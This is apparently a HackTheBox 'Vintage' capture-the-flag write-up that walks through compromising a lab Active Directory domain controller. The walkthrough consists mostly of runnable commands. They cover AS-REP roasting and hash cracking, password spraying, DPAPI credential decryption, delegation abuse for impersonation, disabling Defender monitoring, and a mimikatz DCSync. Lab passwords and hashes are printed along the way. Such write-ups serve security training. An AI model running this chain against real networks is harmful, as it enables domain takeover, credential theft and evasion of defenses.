HackTheBox Vintage Writeup

Explore the fundamentals of cybersecurity in the Vintage Capture The Flag (CTF) challenge, a hard-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.45 dc01.vintage.htb vintage.htb

Script to add hosts automatically

ip="10.10.11.45"
domain="dc01.vintage.htb vintage.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV vintage.htb -Pn

Nmap scan report for vintage.htb (10.10.11.45)
Host is up (0.054s latency).
rDNS record for 10.10.11.45: dc01.vintage.htb
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-03 23:59:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-04T00:00:04
|_  start_date: N/A
|_clock-skew: -8s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Provided Credentials P.Rosa : Rosaisbest123

bloodhound

Ldap user list

ldapsearch -x -H ldap://10.10.11.45 -D "P.Rosa@vintage.htb" -w "Rosaisbest123" -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName | grep "sAMAccountName:" | cut -d " " -f 2 > usernames.txt

Kerberos Tickets

getTGT.py -dc-ip 10.10.11.45 vintage.htb/FS01$:fs01
export KRB5CCNAME=FS01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

getTGT.py vintage.htb/GMSA01$ -hashes 'aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53'
export KRB5CCNAME=GMSA01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb
export KRB5CCNAME=P.Rosa.ccache

ASREPRoasting

Disable PREAUTH

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

Enable Accounts

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_ARK -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_LDAP -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE

GetNPUsers.py -dc-ip 10.10.11.45 -request -usersfile usernames.txt vintage.htb/

Resulted hash

$krb5asrep$23$svc_sql@VINTAGE.HTB:c65f23feb7e3e10c87e6d1a3a432a9cf$7e3d9e28272e1d10795a0c482b3eb538096577268c8721662befadf2367f5e9bd93dbc458e1b86d0b384005c0cab7e0136acebf277e6db07971a34bb1cb9a58178f4cf05ea3d1b4e4737590ecdf024bba30cd1e0391cb771a26a62374acb61c0253354fd043082c8b21d8eda40957a68a7552d9be122a5bbfa1ca666817c6eaaec5f0ac1083bfb98b1e0e4065f140d8bebefe877ab070e91c6d24d33cacac1105e4517d347af3b5c10ff9b707b2d7b43867d0b3f0556c2130c4cd67d08dfa9fac0571f1df6de7c3bdbcbf39d6121380d38120ff210ff74219fd9fe6ba551e03de9301bef3cbe948b820e

Brute Force the Hash

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 18200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

This yields Zer0the0ne

kerbrute --dc vintage.htb -d vintage.htb -v passwordspray usernames.txt Zer0the0ne

C.Neri@vintage.htb:Zer0the0ne

Remember, /etc/krb5.conf is needed, but make sure to remove it after pwning the box, as it can interfere with future pwns.

getTGT.py vintage.htb/c.neri:Zer0the0ne -dc-ip vintage.htb
echo -e '[libdefaults]\n    default_realm = VINTAGE.HTB\n    dns_lookup_kdc = false\n    rdns = false\n\n[realms]\n    VINTAGE.HTB = {\n        kdc = 10.10.11.45\n        admin_server = 10.10.11.45\n    }\n\n[domain_realm]\n    .vintage.htb = VINTAGE.HTB\n    vintage.htb = VINTAGE.HTB
' | sudo tee /etc/krb5.conf
export KRB5CCNAME=c.neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb

cat ../Desktop/user.txt
whoami /priv

DPAPI Credentials

The WinRM download wasn’t working until I removed its hidden property, though I’m not sure why.

cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials'
Set-ItemProperty -Path .\C4BB96844A5C9DD45D5B6A9859252BA6 -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download C4BB96844A5C9DD45D5B6A9859252BA6
cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115'
Set-ItemProperty -Path '.\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'

Local:

dpapi.py masterkey -file '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -sid 'S-1-5-21-4024337825-2033394866-2055507597-1115' -password Zer0the0ne
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key '0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a'

c.neri_adm:Uncr4ck4bl3P4ssW0rd0312

Delegation and SPN Attack

export KRB5CCNAME=c.neri.ccache
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB set object 'SVC_SQL' servicePrincipalName -v "cifs/x"
getTGT.py  -dc-ip 10.10.11.45 'VINTAGE.HTB/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
export KRB5CCNAME=c.neri_adm.ccache
bloodyad -k --host dc01.vintage.htb -d vintage.htb add groupMember "delegatedadmins" "svc_sql"
getTGT.py  -dc-ip 10.10.11.45 'VINTAGE.HTB/svc_sql:Zer0the0ne'
export KRB5CCNAME=svc_sql.ccache
getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0n'
export KRB5CCNAME=L.BIANCHI_ADM.ccache
wmiexec.py -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb -dc-ip 10.10.11.45

type Users\Administrator\Desktop\root.txt

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $True"
lput ./.local/www/win/creds/mimikatz.exe
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator" "exit"

468c7497513f8243b59980f2240a10de